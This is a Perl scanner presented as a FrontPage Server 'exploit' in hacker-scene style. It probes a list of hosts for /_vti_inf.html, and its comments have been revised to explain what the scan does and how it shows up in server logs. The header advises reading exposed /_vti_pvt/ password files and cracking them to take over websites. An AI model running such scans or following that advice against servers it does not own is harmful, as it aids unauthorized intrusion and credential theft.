#!/usr/bin/perl
# ---[ cyberunderground.cjb.net ]---
# EXPLOIT: Front Page Server
# Frontpage Webserver allows authoring and administration of its websites remotely via a web interface.
# It authenticates with a standard username password theme. Vulnerabilities include misconfigurations (which happen
# more often than you might think) that allow outsiders to access this interface without a username or password,
# and read access to these password files. Oftentimes, /_vti_pvt/authors.pwd, administrator.pwd, etc. are world
# readable, and you can use any standard password cracker (Like Crack or John the Ripper - just put the hashes in
# unix passwd format) and you'll have administrative rights to the website. >:-)i
# This little perl program (which must be run under Unix since it uses lynx - unless you have the DOS port of Lynx)
# scans a host for such misconfigurations and open password files.
# have phun!
#
# Various checks on Frontpage servers
# Written by bansh33 of r00tabega.com [bansh33@r00tabega.com]
# www.r00tabega.com
# ---------------------------------------------------------------------------------------------------------------
# Everybody knows about the _vti_pvt password files, but
# what about those misconfigured Frontpage servers that allow
# remote login and authoring without a login and password?
# This script will scan for both vulnerabilities.
# Makes for a quick and easy hack.
# Note: This script is merely a proof of concept exploit, as such, the code probably isn't very clean.
#
# Greetings to Siegesoft, attrition, eEye, w00w00, USSR Labs, ADM, el8, phedz, and others I forgot to mention.
#
# Greetz to all of r00tabega -- my clique for life: busdr1v3r, Griffon, ytcracker, dilusi0n, Axtrex
#
# propz to my mommy and daddy cuz they make me drink my milk
#
# Currently, this code *requires* Lynx. In a future version I may eliminate the dependency on it.
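# ------begin c0de------------------------------------------------------------------------------------------------
use strict;
use warnings;
use Socket;

# What this script does: for every hostname listed (one per line) in the
# file named by ARGV[0], open a TCP connection to port 80, send a single
# HTTP/1.0 "GET /_vti_inf.html" and report whether the status line says 200.
# Despite the header above, this version uses Socket directly and never
# calls lynx.  The original also declared a $postdata string for a second
# request that was never sent; it is dropped here as unused.
#
# Defender's notes: each probe appears in the web server access log as a
# "GET /_vti_inf.html HTTP/1.0" with no Host header, one per connection.
# A 200 only shows that FrontPage Server Extensions are installed; it says
# nothing about whether anything under /_vti_pvt/ is readable.

print "[Frontpage Smack by bansh33 of r00tabega]\n";
print "[ -www.r00tabega.com- ]\n\n";

if (!($ARGV[0])) {
    print "usage: ./frontpage.pl [file with hostnames to check]\n";
    exit;
}

my $filetoopen = $ARGV[0];

# Three-argument open with a lexical handle and an error check.  The
# original's two-argument, bareword, unchecked open would treat a name
# starting with '>' or '|' as a mode or a command, and an unreadable file
# silently produced an empty host list.
open(my $listfh, '<', $filetoopen) or die "Cannot open $filetoopen: $!\n";
my @hosts = <$listfh>;
close($listfh);

foreach my $host (@hosts) {
    # Lines arrive with their newline; inet_aton("example.com\n") does not
    # resolve, which made the original fail on every host read from a file.
    chomp $host;
    next if $host eq '';

    print "\n\nChecking $host for the Frontpage configuration file:\n\n";

    # Resolve before building the address: passing an undef address to
    # sockaddr_in fails rather than yielding a usable sockaddr, so one
    # unresolvable name used to abort the whole scan.  The original also
    # resolved the name twice and printed two messages on failure.
    my $serverIP = inet_aton($host);
    if (!$serverIP) {
        print "Can't Resolve DNS/IP";
        next;
    }
    my $serverAddr = sockaddr_in(80, $serverIP);

    # One socket per host.  The original reused a single bareword handle and
    # never closed it, so every connect() after the first failed and was
    # reported as "Cannot Find".
    my $client;
    if (!socket($client, PF_INET, SOCK_STREAM, getprotobyname('tcp'))) {
        print "Cannot create socket: $!\n";
        next;
    }

    if (connect($client, $serverAddr)) {
        send($client, "GET /_vti_inf.html HTTP/1.0\n\n", 0);
        my $check = <$client>;    # status line, e.g. "HTTP/1.0 200 OK"
        $check = '' if !defined $check;    # server may close without replying
        # Second whitespace-separated token is the status code.  Compared as a
        # string so a non-numeric or missing field cannot trigger a warning.
        my (undef, $code) = split(/ /, $check);
        if (defined $code && $code eq '200') {
            print "Found Frontpage configuration file...\n";
        }
        else {
            print "Cannot Find Frontpage configuration...\n";
        }
    }
    close($client);
}

print "Scan complete.\n";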